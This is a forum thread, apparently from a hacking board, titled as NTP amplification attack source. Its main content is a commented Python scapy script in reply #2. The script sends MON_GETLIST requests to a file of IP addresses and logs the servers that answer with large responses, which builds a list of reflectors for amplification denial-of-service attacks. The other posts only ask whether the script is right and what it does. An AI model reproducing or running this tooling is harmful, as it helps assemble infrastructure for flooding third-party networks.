Simple NTP Amplification Attack Source + Commented

by Zzzzy - 11-05-2017, 06:56 PM
Novice
Posts:
38
Joined:
Dec 2016
Likes:
1
Credits:
0
Reputation:
3
1/2 Year of Service
#1
OP
Posted: 11-05-2017, 06:56 PM
Newbie
Posts:
15
Joined:
Sep 2017
Likes:
0
Credits:
0
Reputation:
0
#2
Posted: 16-09-2017, 06:45 AM
from scapy.all import *
import thread
#Raw packet data used to request Monlist from NTP server
rawData = "\x17\x00\x03\x2a" + "\x00" * 61
#File containing all IP addresses with NTP port open.
logfile = open('output.txt', 'r')
#Output file used to store all monlist enabled servers
outputFile = open('monlistServers.txt', 'a')
def sniffer():
#Sniffs incomming network traffic on UDP port 48769, all packets meeting thease requirements run through the analyser function.
sniffedPacket = sniff(filter="udp port 48769 and dst net 99.99.99.99", store=0, prn=analyser)

def analyser(packet):
#If the server responds to the GET_MONLIST command.
if len(packet) > 200:
if packet.haslayer(IP):
print packet.getlayer(IP).src
#Outputs the IP address to a log file.
outputFile.write(packet.getlayer(IP).src + '\n')

thread.start_new_thread(sniffer, ())

for address in logfile:
#Creates a UDP packet with NTP port 123 as the destination and the MON_GETLIST payload.
send(IP(dst=address)/UDP(sport=48769, dport=123)/Raw(load=rawData))
print 'End'

this is wrong?
Active Member
Posts:
229
Joined:
Mar 2016
Likes:
13
Credits:
244
Reputation:
3
1 Year of Service
#3
Posted: 17-09-2017, 07:13 PM
Use hide tags please, btw can you explain in a little what this script does? for the lazy ones who don't want to go through the hole src like me
we are all supposed to think of reasons to live
The last reply on this thread is older than a month. Please do not unnecessarily bump it.
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)